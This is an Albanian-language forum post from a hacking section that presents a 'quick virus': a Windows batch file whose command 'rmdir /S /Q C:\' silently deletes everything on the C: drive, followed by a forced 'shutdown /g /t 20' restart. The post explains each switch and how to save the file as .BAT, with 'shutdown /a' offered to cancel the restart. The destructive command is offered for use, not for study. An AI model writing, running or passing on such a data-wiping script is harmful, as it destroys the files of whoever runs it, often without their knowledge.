ForumPortalCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 1 Virus i shpejt...!!

Shko poshtë 
AutoriMesazh
N!T!
V.I.P.
V.I.P.
N!T!

Numri i postimeve : 153
Age : 23
Nga Jeni : strellci
Registration date : 20/12/2008

MesazhTitulli: 1 Virus i shpejt...!!   Sun Dec 21, 2008 10:20 am

1 Virus i shpejt per 1 min

Ky virus fshin çdo gje qe ndodhet ne adresen qe do ti te fshish.

Kodi:
rmdir /S /Q C:\
shutdown /g /t 20
rmdir = i jep komanden kompiuterit qe te fshij
C:\ = eshte hard disku, ne vend te saj mund te veni çdo lloj adrrese tjeter
/S = eshte per te fshire gjithçka, edhe filat edhe subfolderat qe ndodhen ne adrresen qe shkruani ju. nese nuk e shkruani do fshihen vetem filat qe ndodhen ne ate adrrese.
/Q = quiet -> pa zhurme, dmth nuk pyet userin a do apo jo te fshij ato skedare por ekzekuton komanden direkt.
shutdown = e dine te gjithe, eshte per te fikur komputerin, po te doni kete rreshtin ketu mund edhe mos ta shkruani.
/g = shutdown computerin, pastaj e ristarton prap dhe pasi te jete hapur sistemi perseri, ristarton te gjithe programet (aplikacionet) e rregjistruar.
/t = per te vendosur pas sa sekondash do qe te ristartohet kompiuteri. gjithashtu nese perdoret mbyll me force te gjithe programet, edhe ato qe normalisht i kerkojne userit a te mbyllen apo jo (perpara nje ristartimi ose shutdown te papritur).

**Kodi shkruhet ne Notepad dhe ruhet Emri.BAT
Nese nuk vendosni numrin e sekondave pas "/t" kodi funksionon prape dhe shkon deri ne 30 sec. e cila eshte koha default e windowsit.
Per te ndaluar ristartimin e kompiuterit shtoni "/a" pas "shutdown" dhe hapeni filein perpara se te mbaroi koha e fileit qe keni hapur me pare.

Kodi:
shutdown /a
Kaq eshte e gjitha.
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.dj-niti-a.piczo.com
 
1 Virus i shpejt...!!
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: ¸.·´¯) Paneli i Kontrollit (¯`·., :: Hacking-
Kërce tek: